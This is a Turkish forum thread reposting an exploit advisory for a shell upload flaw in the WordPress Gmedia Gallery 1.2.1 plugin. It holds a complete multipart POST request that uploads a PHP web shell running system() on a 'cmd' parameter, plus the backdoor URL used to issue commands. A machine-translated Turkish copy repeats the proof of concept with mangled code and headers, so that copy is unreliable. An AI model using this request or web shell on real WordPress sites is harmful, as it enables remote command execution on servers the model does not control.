Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability

Holigano · 3 May 2015

Kod:

# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.codeasily.com/
 
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip
 
# Date : 2014-08-01
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Description : 
 
Any user could upload php files (administrator by default).
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-08-01:  Discovered vulnerability
2014-08-01:  Vendor Notification (Twitter)
2014-08-01:  Vendor Response/Feedback
2014-08-02:  Vendor Fix/Patch
2014-08-02:  Public Disclosure
 
######################
 
# PoC:
 
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"
 
.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"
 
0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"
 
1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"
 
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream
 
<?php
 
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
 
?>
 
 
 
-----------------------------304431219031197--
 
 
Backdoor location:
 
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd

Türkçe

Kod:

# Başlık Exploit: Wordpress Gmedia Galeri Shell Upload Güvenlik Açığı 1.2.1 
 
# Yazar Exploit: Claudio Viviani 
 
# Satıcı Web Sitesi: http://www.codeasily.com/ 
 
# Yazılım Link: http://downloads.wordpress.org/plugin/grand-media.zip 
 
# Tarih: 2014/08/01 
 
Windows 7 / Mozilla Firefox: # üzerinde test edilmiştir 
 
###################### 
 
# Açıklama: 
 
Herhangi bir kullanıcı php dosyalarını (varsayılan olarak yönetici) yükleyebilir. 
 
###################### 
 
# Güvenlik Açığı Bilgilendirme Timeline: 
 
2014/08/01: Discovered açığı 
2014/08/01: Satıcı Bildirim (Twitter) 
2014/08/01: Satıcı Tepki / Geri Bildirim 
2014/08/02: Satıcı Fix / Patch 
2014/08/02: Kamuyu Aydınlatma 
 
###################### 
 
# PoC: 
 
POST 
= 127.0.0.1 ev sahipliği 
User-Agent = Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 31.0) Gecko / 20100101 Firefox / 31,0 
Kabul = text / html, application / xhtml + xml, uygulama / xml; q = 0.9, * / *, q = 0.8 
Accept-Language = it-IT, o; q = 0.8, en-US; q = 0.5, tr, q = 0.3 
Accept-Encoding = gzip, deflate 
Referans = http:? //127.0.0.1/wordpress/wp-Admin/admin.php sayfa = GrandMedia_AddMedia 
İçerik-Uzunluk = 916 
Content-Type = multipart / form-data; sınır = --------------------------- 304431219031197 
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da;  wordpress_test_cookie = WP + Çerez + kontrol edin;  wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7;  wp-ayarları-time-1 = 1406915840 
Bağlantı = canlı tutma 
Pragma = no-cache 
Cache-Control no-cache = 
PostData = ----------------------------- 304431219031197 
Content-Disposition: form-data; = "isim" adı 
 
.shell.php 
----------------------------- 304431219031197 
Content-Disposition: form-data; name = "yığın" 
 
0 
----------------------------- 304431219031197 
Content-Disposition: form-data; name = "topakları" 
 
1 
----------------------------- 304431219031197 
Content-Disposition: form-data; name = "params" 
 
terimler% 5Bgmedia_category% 5D = & terimler% 5Bgmedia_album% 5D = & terimler% 5Bgmedia_tag% 5D = 
----------------------------- 304431219031197 
Content-Disposition: form-data; = "file" adını; filename = ". shell.php" 
Content-Type: application / octet-stream 
 
<? php 
 
if (isset ($ _ İSTEK) ['cmd']) {
         "<pre> echo"; 
         $ cmd = ($ _REQUEST ['cmd']); 
         sistemi ($ cmd); 
         echo "</ pre>"; 
         die; 
} 
 
?> 
 
 
 
----------------------------- 304431219031197-- 
 
 
Backdoor konumu: 
 
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd

Feneray · 3 May 2015

Konu paylaşırken alıntı yaptınıgnız hakkında alıntı yazınız > http://www.homelab.it/index.php/201...dia-gallery-1-2-1-shell-upload-vulnerability/

Ara

⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR

Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability

Holigano

Forumdan Uzaklaştırıldı

Feneray

Yeni Üye